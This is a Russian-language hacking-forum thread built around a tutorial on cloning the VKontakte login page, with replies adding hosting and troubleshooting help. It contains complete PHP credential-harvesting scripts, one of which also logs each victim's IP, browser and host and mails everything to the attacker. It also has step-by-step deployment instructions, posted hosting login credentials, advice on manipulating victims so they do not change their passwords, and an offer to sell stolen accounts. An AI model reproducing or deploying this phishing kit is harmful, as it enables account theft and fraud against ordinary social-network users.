Просмотр полной версии : Фейк на скорую руку
СТАТЬЯ БОЛЕЕ НЕ АКТУАЛЬНА!
Вбудущем, когда будит свободное время-напишу новую
Да, некоторые фейки можно скачать тут :http://nonz.name/?cat=53
[iNtrO]
Делать было нечаго,дело было вечером....Собственно на первую мою статью (первую на античате), потянул меня тот факт, что в разделе купи/продай/обменя/кинь по крупному есть тема, в которой один хеккер продовал фейки аж по 10 вмз, да и часто просят создать тот или иной фейк...
Я же расскажу одной статьей как можно забацать универсальный фейк почти подо все, что угондо! Покажу на примере фейка вконтакте.
[SeaRchINg]
И так, 1 что нам нужно, так это выбрать жертворесурс и собрать всю нужную нам инфу,а нам нужна толька копия некоторых страниц.Идем на vkontakte.ru через Operu (!). Жмякаем кнопочку вход, попадаем на логин.пхп, ее и возьмем за индекс нашего фейка. Жмем в опере: Фаил-->Сохранить как-->В открывшимся диалоге под названием выбираем (по умолчанию там стоит Веб Архив....) "HTML Фаил с изображениями", и обезательно графу Имя Файла пишем index(или login.htm- в зависимости от страницы)
http://s52.radikal.ru/i136/0901/21/529fddcbba41.jpg
Далее вводим туда нереальные данные и попадаем на страницу, на которой написано
Такой почтовый адрес не зарегистрирован, либо пароль неверный.
Сохраняем ее точно так же, только вместо index пишем bad.
Далее вбиваем в Google.ru фразу Vkontakte.ru, жмем Дополнительные результаты с vkontakte.ru » и ищим что-то связанное с эрором контакта... На вторйо страницы я нашел VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- запоминаем,нам понадобиться эта ссылка
Усе, все что нам надо для фейка от ресурса, у нас уже есть.
[CoDiNg]
Такс, теперь иследуем форму логина. Открываем наш index.html и ищем форму входа.
<form method="post" name="login" id="login" action="login.php">
<input type="hidden" name="success_url" id="success_url" value="">
<input type="hidden" name="fail_url" id="fail_url" value="">
<input type="hidden" name="try_to_login" id="try_to_login" value="1">
<table align="center" cellpadding=0 cellspacing=7 border=0 width="40%">
<tr>
<td width="100px">
<span class="grey">Email:</span>
</td>
<td>
<input class="inputText" type="text" name="email" value="" id="email" size="25" />
<td>
</tr>
<tr>
<td>
<span class="grey">Пароль:</span>
</td>
<td>
<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />
</td>
</tr>
<tr>
<td>
</td>
<td>
<input style="margin-top:1px; vertical-align: middle;" type="checkbox" name="expire" id="expire" value="1" /><small>Чужой компьютер</small>
</td>
</tr>
<tr>
<td>
</td>
<td>
Отсюда запоминаем 3 вещи:
1) <form method="post" name="login" id="login" action="login.php">
2) <input class="inputText" type="text" name="email" value="" id="email" size="25" />
3) <input class="inputText" type="password" name="pass" value="" id="pass" size="25" />
Именно в этих 3 вещах заключаеться первая часть уникальности, на любой социалке или эмайле или еще где либо, везде форма входа(поля), будут в таком види (ну только название полей будит отличаться),к примеру у однокласников это
<input id="field_password" value="" style="width: 170px;" type="password" size="20" name="st.password">
Тоесть просто отличаеться название полей, элементами дизайна-но функция у всех одна и таже.
Теперь мы создаем пхп файл, и называем его к примеру login.php,его содержимое:
<?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at");
flock($f,2);
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['password'])){
fputs($f, $_POST['email'].";".$_POST['password']." \n");
header("Location: http://");
} else {
header("Location: http://");
}
flock($f,3);
fclose($f);
?>
Собственно смотрим на скрипт, пару строчег, но это вполне нормальный фейк,его функционал:
Сохранение передаваемых переменных,их проверка,редирект в зависимости от проверки.
И так, теперь возвращаемся к тем 3 строчкам:
1) <form method="post" name="login" id="login" action="login.php">
тут у нас все в порядки,имя нашего скрипта совподает с именем ихнего, нобывает что и не совпадет, тогда заменяем его или же переиминовываем наш.
2) <input class="inputText" type="text" name="email" value="" id="email" size="25" />
<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />
Отсюда нам нужно name="email" и name="pass"
Вставляем их в наш скрипт в нужное место
<?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at");
flock($f,2);
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['pass'])){
fputs($f, $_POST['email'].";".$_POST['pass']." \n");
header("Location: http://");
} else {
header("Location: http://");
}
flock($f,3);
fclose($f);
?>
Кто не заметил, это $_POST['email'] и $_POST['pass']
Далее смотрим скрип, тут стаит функция IF ELSE, и прегматч, тоесть если поле эмайл соотвествует эмайлу(ника@мыло.ру, а не как водят ывпмдвгк), и поле пароль не пустое, то выполняеться первый редирект, если же эмаил не соответствует или поле пасс пустое, то на второй редирект. Из этого следует,что если челл ввел мыло и что-то похожее на пасс, то кидаем его на страницу с эрором http://vkontakte.ru/blank.php?code=10, а если ввел херню (вот тут нам и понадобилась копия страницы bad.html?когда мы вводили неверные данные), то кидаем его обратно, тоесть вписываем bad.htm.
Выглядит это так:
<?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at");
flock($f,2);
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['pass'])){
fputs($f, $_POST['email'].";".$_POST['pass']." \n");
header("Location: http://vkontakte.ru/blank.php?code=10");
} else {
header("Location: bad.htm");
}
flock($f,3);
fclose($f);
?>
Сохраняем.Заливаем всю лабуду на сервер(login.php,index.htm+папка с файлами,bad.htm+папка с файлами),создаем файил log.txt(советую свое уникальное имя придумать. не забудьте в скрипте сменить),ставим на него chmod777.
Вот и все
[THe eND]
Собственно что уникального, а то что вы можете зайти на на одноклассников, так же сохранить страницу,вписать переменные,заменить урлы( вот сразу даю http://odnoklassniki.ru/dk?st.cmd=error) и все, обсолютно так же зайти на майил.ру, сохранить переменные и заменить и все))) Единственное, что вам может понадобиться-это креативность, добустим сохранять не главную страницу, а страницу входа.Вы так же можете сделать любой форум, если вы допустим хотите получить акк(отправляете в пм
<a href="фейк">ссылка на тему</a> , а в фейке указываете эту тему для редиректа.
Ну и в конце хочу добавить, если кто-то хочет купи акки социалок-стучити, цены актуальные)))
не.... букаф многа =)
pS:в избранное :D
тут на пальцах расписано, что бы не возникало вопросов.
nonamez , шикарно , можно идти работать :]
бояно-боянисто-боянинестично-боянкобояиноый-боян
то есть подобные статьи видел уже раз 7
бояно-боянисто-боянинестично-боянкобояиноый-боян
то есть подобные статьи видел уже раз 7
:p это для моего возраста :)
щас кто нибудь напишет: а как изменить адерес в браузере на странице фейка?...
Cthulchu
03.01.2009, 15:16
а как изменить адерес в браузере на странице фейка?...
ЗЫ
А что делать? Статья - борода. Как только автор может писать такое... не осилил ибо боян.
я уже заметил не раз что ты только пиздишь, а от самого никакого толка. Ты что-нибудь лучше сделай, а потом пизди.
изобретение велосипеда только скоростей тут многовато?
и не лень было писать ведь каждый хоть кто либо разбирающийся в кодинге сможет это сделать а кто не разбирается может просто попросить сделать.
научи лучше как сделать
http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1230983426&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx%3Fn %3D642107092&id=64855
это и расчитано на тех, кто не разбираеться в кодинге.
фейки - любимая тема авторов для написания статей)))) На любом хак-форуме статей по 10 про фейки есть =)
Dr Flint
04.01.2009, 04:22
человек старался) Я думаю , что его старания приведут к тому, что больше не будет топов такого плана :"Напишите мне ФЕЙК ПЛИЗЗ"
))
Carnivore.Sys
04.01.2009, 08:16
Статей таких море но за старанее +
окей, вообще фиг че больше буду писать.
Да ладно вам. Боян - не боян, а на ачате я такой статьи не видел. на самом деле напишите что-нибудь сами свое для начала, а потом уже критикуйте... автор в теме все раскрыл очень доходчиво... любой поймет... на ачате дохера статей про скули и что? одна другую дополняет, а одной сразу про все нима(( а тот кто напишет ее пошлют на и скажут, что боян... вы задумайтесь хоть немного...
окей, вообще фиг че больше буду писать.
не обращай внимание на стёб всё толково написано,пиши ешё!!!
Всё классно написано и доступно для новичков, пиши дальше статьи!!! Россия Богатая страна а придурками тем более не обращай на них внимания, они тока и знают такие слова как "Боян" по мне критики это Блядьё и Гандилы!!!! А лично тебе nonamez я выражаю благодарность за старания!!!!
satana8920
06.01.2009, 19:51
боян конечно но чел старался по этому +
dinar_007
07.01.2009, 05:14
Похвально!:) Статью читал взахлеб:) Воть
Молодец, Статьи нужны, хотя дело каждого. Для когото это норм, для когото это круто, для ещё х.з. как их там...
Stil Free
07.01.2009, 11:49
У меня трабла с фейком незнаю где права присваивать напишите поподробней где и как?
небольшой апдейт для тех, кому понравилось...
Че-то больно крутовато...
ну допустим сделал фейк.. как им пользоваться? изв за глупый вопрос
eworld.uz
11.01.2009, 01:32
А можете сказать куда их лучше закачивать..???
diman19911
11.01.2009, 06:11
Старый баян писалась на ачате статья неоднократно!
Seaterror
11.01.2009, 09:43
своими боянами всю тему зафлудили ...
статья нормальная, особенно для тех кто встал на путь ачата )) надо же откуда то начинать учиться )
не пользоваться готовым а именно разбираться по вот таким вот мануалам с подробным описанием как да что. над повышать культуру в россии а то вон какието турки и то задирают уже :o
... привыкли все пользоваться готовеньким да халявным ...
eworld.uz
11.01.2009, 12:58
Ну куда можна залить всё это...Скажите какие нибудь бесплатьные хостинги..
Статья нормальная. Но раз она написано специально для тех, кто не разбирается в кодинге, то реально смотри просьбы выше: надо дописать где можно быстро, удобно зарегать фри-хост с поддержкой php, как туда вылить файлы (я бы например дописал про h1.ru) через фтп (простейший вариант через Total Commander) и поставить на скрипт права 755, а на лог 777.
Чтобы просто не трепаться, я напишу свой вариант. Итак: как зарегать, как залить, выставить права.
1) Идем на какой-нить сайт, де регают фри-хосты с поддержкой php. Я не был оригинален и выбрал holm.ru. Там есть ссылочка по типу Создать сайт на русском языке, соответственно ширяем ее, заполняем все данные. Все, через несколько часов хостинг с поддержкой PHP в Вашем распоряжении.
2) На мыло, указанное при регистрации, придут реквизиты вида
Server: имя_указанное_при_регистра ии.h18.ru
login: логин
password: пароль
Запускаем всеми любимый Total Commander, жмем CTRL+F - Добавить. Тут в графе Сервер вводим реквизит Server, в графах Учетная запись и Пароль - думаю что вводить не надо объяснять =) Жмем ОК, выбираем в списке нужный сервер (можно в описании так и забить "ФЕЙК"), соединяемся. После некоторого времени нас пускают на ftp, куда можно заливать файлы.
3) Заливаем туда файлы из статьи. Лучше всего поставить тип передачи - Автоматический.
4) Права. Для файла login.php необходимы права на выполнение (755), чтобы их выставить достаточно просто выделить этот файл, и лезть в меню Файл-Изменить атрибуты... Тут попросту в поле вбиваем нужные нам атрибуты (755).
Для самых деревянных! Процедуру установки прав необходимо выполнять в окне ftp, а не локальной папки. Ато через пару постов как всегда улышим: ааааа... у меня нету такова!!! там можно только Скрытый, Системный ставить! аааа...
Еще необходимо создать файл log.txt и лучше выставить ему полные права (777).
Ну все собственно. Мог что-то забыть, если забыл - пишите, дополню.
Ах да... Вот зарегал давно еще хост с такими реквизитами:
Server: dee2008.h18.ru
login: dee20018
password: gn5kBHWm
ибо сейчас вроде на Холме какие-то проблемы с регистрацией. Ну как говорится: хотите - пользуйтесь ))) Кто первый взял - того и лыжи =)))
З.Ы. Помогло - ставь + :-D
holm.ru подскажите счто нибудь другое.. holm.ru здесь уже незя регатьсо =(
eworld.uz
11.01.2009, 14:29
но там внизу ex3me дал же логин и пароль для holm.ru.......
Еще и можна на freevar.com
Zymic.com
можно получить хост вида траляля.uuuq.com
http://members.000webhost.com/login.php
тогда вот..но у мну нифига не получилось зарегаться
чтобы там зарегаться необходимо ввести свои данные и скачать прогу якобы для "активации" и подтверждения твоего ИП
вот что мне выдал каспер, когда я попытался скачать сию прогу:
Троянская программа:
Trojan.Win32.Aget.arjp
Файл:
C:\Documents and Settings\Администратор\Рабочий стол\ip_confirm.exe
За распространение ссылок на такие "хорошие" сайты можно и бан выхватить (откуда нам знать не ты ли владелец сего чудного сервиса)
удалено: троянская программа Trojan.Win32.Agent.arjp
Файл: C:\Documents and Settings\Администратор\Local Settings\Application Data\Opera\Opera\profile\cache4\opr045CP//PE_Patch//UPack
удалено: троянская программа Trojan.Win32.Agent.arjp
Файл: C:\Documents and Settings\Администратор\Рабочий стол\ip_confirm.exe//PE_Patch//UPack
eworld.uz
11.01.2009, 14:43
http://www.000webhost.com/order.php вот можна зарегиться тут..
ооо хорошо что я тама не зарегилься...спс
Хм.. это не трой... но ты его на хр не запустишь .. для этого нужно mac os...
Это пито проверка лицензии... как то так... друг регал.. брал у соседа бук . и через него регал.. все врод норм..
За распространение ссылок на такие "хорошие" сайты можно и бан выхватить (откуда нам знать не ты ли владелец сего чудного сервиса)
Владелец не я....
ты сам то понял что сказал? какой МакОС?
четко и понятно: каспер пишет Win32 а не MacOS
друг регал. тут 2 варианта: либо друг лопух, либо он решил тебя развести
ты сам то понял что сказал? какой МакОС?
четко и понятно: каспер пишет Win32 а не MacOS
друг регал. тут 2 варианта: либо друг лопух, либо он решил тебя развести
иди лесом...раз не нравитсо...
вот нашел получше..ниче качать не надо и тд..
http://freehostia.com/ :)
В данном случае база с отчетами может быть спалена?
ReduKToR
19.01.2009, 21:08
03.01.2009, 00:41
сообсно знал давно,нового ничего неоткрыл, единственно -этим прекрыл разаботок для всех тех кто это делал юзерам за деньги
а если пораскинуть мозгами то мона и без всякого мануала додуматься как сделать чтоб лог и пасс шли в .тхт файл,а при входе переадресация на файл с ошибкой ввода )))
Спасибо за статю ! Респект ТС
за труд + , но ничего нового.
а если пораскинуть мозгами то мона и без всякого мануала додуматься как сделать чтоб лог и пасс шли в .тхт файл,а при входе переадресация на файл с ошибкой ввода )))
бльо тока на днях думал етим свою дополнить:)
а если пораскинуть мозгами то мона и без всякого мануала додуматься как сделать чтоб лог и пасс шли в .тхт файл,а при входе переадресация на файл с ошибкой ввода )))
хехе, а что раньше не так делали ? )
нормальный такой фак,чисто для меня,спасибо!
кто через seebase.php проверяет базу с акками?
я никак не могу понять как через неё выходить, не получается... всё время через фтп лажу
FALTONICK
28.02.2009, 20:11
статья супер спасибо
Тааак.
А че AnyFake от Бузи не катит? [http://forum.antichat.ru/thread44845.html]
Или Universal Fake от Ponchika тоже? [https://forum.antichat.ru/showthread.php?t=105983]
Тааак.
А че AnyFake от Бузи не катит? [http://forum.antichat.ru/thread44845.html]
Или Universal Fake от Ponchika тоже? [https://forum.antichat.ru/showthread.php?t=105983]
бузи уже устарел(мну по крайней мере норм не попадался), пончик уже запостил посли этой статьи
Все расписал как для ламов))
А по делу молодец.
да все норм !
ток подскажите плиз как сделать чтоб данные бызы он пересылал на мыло
заранее спс )
inlanger
15.04.2009, 15:59
есть функция mail(), делайте по манам, она очень простая
сори ткните носом в ман ато искать жуть ;(
Markus_13
15.04.2009, 20:17
ппц, в гугле сложно вбить "функция mail в php" ?
mail($кому,$тема,$тело);
-=$MiRoN$=-
19.04.2009, 02:28
Спасиба за Статью !
Сейчас пойду роботать...
Всё понятно было до момента где нужно создать пхп файл. На чём его создать, где его создать?
nedhoog, пхп файл - обычный txt файл с расширением php залитый на хост с поддержкой этого же самого пхп =))) Тоесть нужен хост с поддержкой и дальше по инструкции.....
satana-fu
24.04.2009, 02:04
Отличная статья, жалко, что надо не только объяснять, но разжевывать некоторым индивидам, которые кричат о помощи даже не дочитав статью до конца))), хотя это простимо, сами были когда то такими... )))). ТС респект за труд...
Когда я начинал, как то попросил у Zorgus помощи в решении одной проблемки, он не помог, мотивируя "учись догонять решение проблемы сам, анализируй". До сих пор ему за это благодарен...
Новички, если что то не понимаете, попробуйте часика два поэкспериментировать, попытаться понять сам процесс, как это все работает, если уж и тогда не получится, тогда уже за помощью на ачат... Это вам же будет полезно.
Zerokko
satana-fu
Спасибо!
Я всего-лишь опытный пользователь ПК. Все тонкости мне пока неизвестны/не понятны. Конечно, попытаюсь вникнуть во всё сам, но и рассчитываю на вашу помощь.
Хоть убейте, но не могу понять вот это:
"создаем файил log.txt(советую свое уникальное имя придумать. не забудьте в скрипте сменить),ставим на него chmod777."
И как залить всё полученное добро в созданный сайт на Holm.ru
Всё разобрался со всем, но не пашет нифига (
Следуя строго по инструкции я должен получить логин и пароль в файле log?
satana-fu
24.04.2009, 10:45
да, не забудь поставить на базу паролей разрешение 777, оно позволяет посетителям записывать в базу паролей данные из формы ввода (пароль, логин), то есть нажимая ВВОД жертва активирует файл скрипта и автоматом сам запишет свои пароли в твою базу. Мой совет, попробуй сделать эксперимент на freehostia.com, там полное описание всех разрешений.
И еще, когда фейк будет готов, не спеши в порыве воодушевления рассылать его всем подряд, в таком случае ты портишь воздух сам себе, а то чем больше людей догонят что такое фейк, тем сложнее будет тебе его впарить потом, когда тебе это будет реально необходимо.
фейки расчитанные на особо тупых и подобные http://vkontakhkte.ru или http://vkontacte.freehostia.com подпортят тебе в будущем малину )) поэтому будь осторожен.
Если вообще внатак будет, стучись в асю после 8 вечера, помогу разобраться с фейком и объяснить значение каждой команды.
Спасибо satana-fu, но что-то не выходит...
Сделал index и bad.htm с папками, скопировал скрипт (login) со скрина (просто скопировал скрипт в tht файл), создал log.tht засунул всё на сайт. Присвоил log.tht разрешение 777. Проблема в том что я не сделал login.tht в login.php? Если да то как это сделать? Просто переименовать?
Спасибо satana-fu, но что-то не выходит...
Сделал index и bad.htm с папками, скопировал скрипт (login) со скрина (просто скопировал скрипт в tht файл), создал log.tht засунул всё на сайт. Присвоил log.tht разрешение 777. Проблема в том что я не сделал login.tht в login.php? Если да то как это сделать? Просто переименовать?
Конечно не будет пахать переименуй "login.tht" в login.php !
satana-fu
24.04.2009, 12:03
nedhoog, стучись в аську... жду тебя в ближайшие пару часов
Хоть убейте, но не могу понять вот это:
"создаем файил log.txt(советую свое уникальное имя придумать. не забудьте в скрипте сменить),ставим на него chmod777."
И как залить всё полученное добро в созданный сайт на Holm.ru
После того как все готово открываеш блокнот ->сохранить как log.txt-> на маил который зареген твой сайт высылаться данные для FTP вот типо таких
ДОСТУП К СЕРВЕРУ Для доступа к серверу вам надо использовать любой FTP клиент. Параметры соединения:
Server: твой сайта.h18.ru
login: Логин для доступа
password: пароль для доступа
Контекнимся и заливаем это все в корневую папку
и на фаил "log.txt" Выставляем права "chmod777"
Конечно не будет пахать переименуй "login.tht" в login.php !
Безрезультатно. Делаю для Одноклассников- ввожу лог, пасс, заходит на страничку. Но в log.tht ничего нету. В контакте даже ввести пароль и лог не получается, кнопка вход не реагирует.
Безрезультатно. Делаю для Одноклассников- ввожу лог, пасс, заходит на страничку. Но в log.tht ничего нету. В контакте даже ввести пароль и лог не получается, кнопка вход не реагирует.
Блин ты читать умееш я же написал переименуй!
Сообщение от Dumi
Конечно не будет пахать переименуй "login.tht" в login.php !
log.tht НЕ ПАРВИЛЬНО!!!!!!1111
log.php ПРАВИЛЬНО111!!!
Ну говорю же, безрезультатно
да,заметил изменения в странице контактаф-по этому и не идет-в данный момент смотрю(вставили яву гандоны).
как время будит-посмотрю
jekascorp
27.04.2009, 00:13
Привет.попытался сделать фейк одноклассников,залил на 000webhost.com .страница открывается,но когда вводишь логин и пароль вылазит вот ета ошибка
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /home/a7703566/public_html/login.php on line 2
Free Web Hosting
PHP Error Message
Parse error: syntax error, unexpected T_STRING in /home/a7703566/public_html/login.php on line 2
Free Web Hosting
Что это ,подскажите пожалуйста???
satana-fu
27.04.2009, 01:56
Привет.попытался сделать фейк одноклассников,залил на 000webhost.com .страница открывается,но когда вводишь логин и пароль вылазит вот ета ошибка
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /home/a7703566/public_html/login.php on line 2
Free Web Hosting
PHP Error Message
Parse error: syntax error, unexpected T_STRING in /home/a7703566/public_html/login.php on line 2
Free Web Hosting
Что это ,подскажите пожалуйста???
скинь код файла login.php
jekascorp
27.04.2009, 13:12
я только начинаю.как скинуть?спасибо
satana-fu
27.04.2009, 17:54
я только начинаю.как скинуть?спасибо
сделай вот что.
1. проверь код в файле login.php
$f=fopen("log.txt","at");
2. проверь называется ли файл базы log.txt
3. проверь поставил ли ты на файл log.txt разрешение chmod777
После все должно заработать
jekascorp, кидай первые 4 строки, зачем гадать что у тебя там, просто засвети 2ю строчку и какое название базы, куда всё записывается..
вобщем, у тебя может быть 2 проблемы, либо название базы, либо у тебя неверно обрабатывается строка, где название форы упоминается и они не совпадают с именем в скрипте обработчика.. засвети всё и будет видно.
мне как новичку тема понравилась.
techtonik:)
29.04.2009, 10:54
Спасибо за статью! Но я фейк сам могу делать!
-=Denya=-
29.04.2009, 17:17
Спасибо за Статью!
Статья - гавно.
Напишешь лучше?? Прежде чем писать такие вещи, вначале подумай, а уж когда подумал, обосновывай это.
satana-fu
06.05.2009, 11:35
Напишешь лучше?? Прежде чем писать такие вещи, вначале подумай, а уж когда подумал, обосновывай это.
Некоторые люди думают, что стоит обозвать всех дураками, чтобы прослыть умными. Его пост был из этого разряда))), не стоит обращать внимание на тех, кто из кожи лезет чтобы привлечь его))),
Жмем в опере: Фаил-->Сохранить как-->В открывшимся диалоге под названием выбираем (по умолчанию там стоит Веб Архив....) "HTML Фаил с изображениями"
при этом выйдет [censored] поскольку дизайн сайта Вконтакте построен за участием css
во избежание этой проблемы глянем сорц
<link rel="stylesheet" href="/css/rustyle.css?29" type="text/css" />
<link rel='stylesheet' href='css/help.css?2' type='text/css' />
1-ый css (http://vkontakte.ru/css/rustyle.css?29%22%20type=%22text/css%22)
2-ой css
(http://vkontakte.ru//css/rustyle.css?29)
немного изменим код
<link rel="stylesheet" href="http://vkontakte.ru//css/rustyle.css?29" type="text/css" />
<link rel='stylesheet' href='http://vkontakte.ru/css/help.css?2' type='text/css' />
}{@r}{imon
12.05.2009, 23:30
долго делать потом аверс попробую но не уверен
satana-fu
21.05.2009, 16:19
вариации на тему "файл login.php"
Удобен тем, что высасывает всю инфу. При это сохраняет отчет в базе и высылает ее на почту.
<?PHP
$email = $_POST['email'];
$c = "$email:$pass";
$Browser = getenv("HTTP_USER_AGENT");
$Port = getenv("REMOTE_PORT");
$Connect = $_SERVER['HTTP_CONNECTION'];
$Host = gethostbyaddr(getenv("REMOTE_ADDR"));
$pass = $_POST['pass'];
$ip = $_SERVER["REMOTE_ADDR"];
$Data = date("d-m-y H:i:s", time());
$text = "[$Data]
Browser:[$Browser]
Port:[$Port]
Connect:[$Connect]
Host:[$Host]
IP:$ip
Мыло:$email Пасс:$pass";
$to = "ваше_мыло@mail.ru"; //
$sub = " Pass : $email";
mail($to,$sub,$text);
$f=fopen("base.php","a+");
flock($f,2);
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-zA-Z-]+\.)+[0-9a-zA-Z]{2,4})$/i",
$_POST['email'])&& !empty($_POST['pass'])){
fputs($f,
$_POST['email'].";".
$_POST['pass']." \n");
header("Location: http://vkontakte.ru");
} else {
header("Location: bad.html");
}
flock($f,3);
fclose($f);
?>
Выявилась ситуация, что люди просто копируют код. Поясняю для новичков. Код нужно присобачить под себя. Это просто шаблон. Если у вас файл базы называется base.txt, то исправьте тут
$f=fopen("base.php","a+"); под себя.
У меня проблема: когда ввожу емайл типа нгегнкг и пароль такого же типа. Пишет "Такой почтовый адрес не зарегистрирован, либо пароль неверный." здесь правильно, но когда пишу login@email.ru и какой нибудь пароль пишет также. И bad.htm удалил все равно пишет тоже самое, хоть и информация приходит на ящик.
satana-fu
21.05.2009, 18:21
У меня проблема: когда ввожу емайл типа нгегнкг и пароль такого же типа. Пишет "Такой почтовый адрес не зарегистрирован, либо пароль неверный." здесь правильно, но когда пишу login@email.ru и какой нибудь пароль пишет также. И bad.htm удалил все равно пишет тоже самое, хоть и информация приходит на ящик.
залей свои файлы на какой нидь файлхостер, и отпиши в личку адрес, скачаю и проверю что у тебя за проблема. Исправленные ошибки отпишу тут
_Spamer_
30.05.2009, 13:09
1)Подскажите там при логинировании вставили яваскрипт. Как теперь изменить login.php ?
2) Как сделать что б сразу после проверки логинилось и перенаправляло на заданый id
1)Подскажите там при логинировании вставили яваскрипт. Как теперь изменить login.php ?
2) Как сделать что б сразу после проверки логинилось и перенаправляло на заданый id
1)чо за скрипт? .
2)header("Location: http://vkontakte.ru/айди");
HellFire
01.06.2009, 10:32
у меня с этим фейком проблема , если в форму ввода пишут по русски то в лог идет текст типо басу и т.п , чем это лечить или хотяб как перевести?
Кстати ненад делать редирект на нормальный вконтакте или на айди и т.д ,пусть лучше юзеру всегда пишется что мол пасс неверный ибо так он начнет вбивать все пассы которые помнит :)
satana-fu
01.06.2009, 12:37
у меня с этим фейком проблема , если в форму ввода пишут по русски то в лог идет текст типо басу и т.п , чем это лечить или хотяб как перевести?
Кстати ненад делать редирект на нормальный вконтакте или на айди и т.д ,пусть лучше юзеру всегда пишется что мол пасс неверный ибо так он начнет вбивать все пассы которые помнит :)
постучись в аську вечером, скину тебе список определений этих символов и как их расшифровывать ( басу )
Насчет редиректа на нормал, как думаешь, если юзер три раза получит ответ что пароль не верный, сколько времени ему понадобиться, чтобы вспомнить как он на эту страницу попал и почему его пароли выдаются как неверные, если он вводит их правильно?
И еще быстрее ему в голову придет мысль что его взломали, и при первой же удачной авторизации юзер пойдет и сменит пароль. Тогда твоя куча паролей бесполезна. :)
СИ рулит)))))) Учим психологию, коллега ;) ;)
HellFire
01.06.2009, 12:49
постучись в аську вечером, скину тебе список определений этих символов и как их расшифровывать ( басу )
Насчет редиректа на нормал, как думаешь, если юзер три раза получит ответ что пароль не верный, сколько времени ему понадобиться, чтобы вспомнить как он на эту страницу попал и почему его пароли выдаются как неверные, если он вводит их правильно?
И еще быстрее ему в голову придет мысль что его взломали, и при первой же удачной авторизации юзер пойдет и сменит пароль. Тогда твоя куча паролей бесполезна. :)
СИ рулит)))))) Учим психологию, коллега ;) ;)
в том то и дело что как показывает опыт с моего фейка юзеры даже нидумают менять пароли даже после 5 неудачных попыток войти , могу даже примеры запостить, коллега. :)
satana-fu
01.06.2009, 18:27
в том то и дело что как показывает опыт с моего фейка юзеры даже нидумают менять пароли даже после 5 неудачных попыток войти , могу даже примеры запостить, коллега. :)
раз на раз не приходится)))), чем держать юзера на фейке пока он поймет в чем дело, лучше отпустить его после двух попыток, больше двух попыток я считаю перебор, хотя в инете есть такие юзеры-блондины, которые и 20 раз введут пароль и не сменят его, но это вымирающий вид)).
но на мою беду, мне заказывают только хакеров, опытных юзеров или программистов, так что если их и поймаешь на фейк, то лучше сразу же отпустить их, пока их мысли заняты темой письма которая и привела их на фейк.
HellFire
01.06.2009, 23:40
раз на раз не приходится)))), чем держать юзера на фейке пока он поймет в чем дело, лучше отпустить его после двух попыток, больше двух попыток я считаю перебор, хотя в инете есть такие юзеры-блондины, которые и 20 раз введут пароль и не сменят его, но это вымирающий вид)).
но на мою беду, мне заказывают только хакеров, опытных юзеров или программистов, так что если их и поймаешь на фейк, то лучше сразу же отпустить их, пока их мысли заняты темой письма которая и привела их на фейк.
мой фейк направлен именно на "вымирающий вид" хотя судя по результатам просторы инета еще богаты подобными юзерами. В асю тебе недостучался так что опиши тут как расшифровать любвинет (как я понял это слово "любвинет") и т.п а то мб у кого тоже такое... преобразование текста в другие кодировки что то непомогает =\
HellFire
02.06.2009, 00:08
всё со своей проблемой разобрался , если у когот тоже пасс в другой кодировке приходит юзайте сервис _http://www.artlebedev.ru/tools/decoder
а чтоб в последствии в лог файле небыло проблем с кодировкой то после редактирования сохраняйте его в UTF-8
А возможно сделать чтобы лог отсылался в icq.
На мыло не проще? В аську может и не дойти, если ты оффлайн, на мыло надежнее и удобнее
Ребят помогите сделать фейк
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1049&id=64855&mkt=en
vlad_tsepesh
04.02.2010, 02:11
тут на пальцах расписано, что бы не возникало вопросов.
Я конечно уважаю твои познания,но если создать фейк и отправить жертве ссылку с фейком,то при переходе на фейковую страницу появляется сообщение с таким текстом:
ВКонтакте | Потенциально вредоносная ссылка
Ссылка, по которой Вы попытались перейти, ведёт на сайт, расположенный на бесплатном хостинге.
Обычно такие сайты используются спамерами и мошенниками для перенаправления на потенциально опасные сайты, а также могут содержать вирусы.
ВКонтакте всегда заботится о Вашей безопасности!
Что скажешь на это???
Как ты это обойдешь???..............Люди,что вы об этом думаете??? :confused:
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot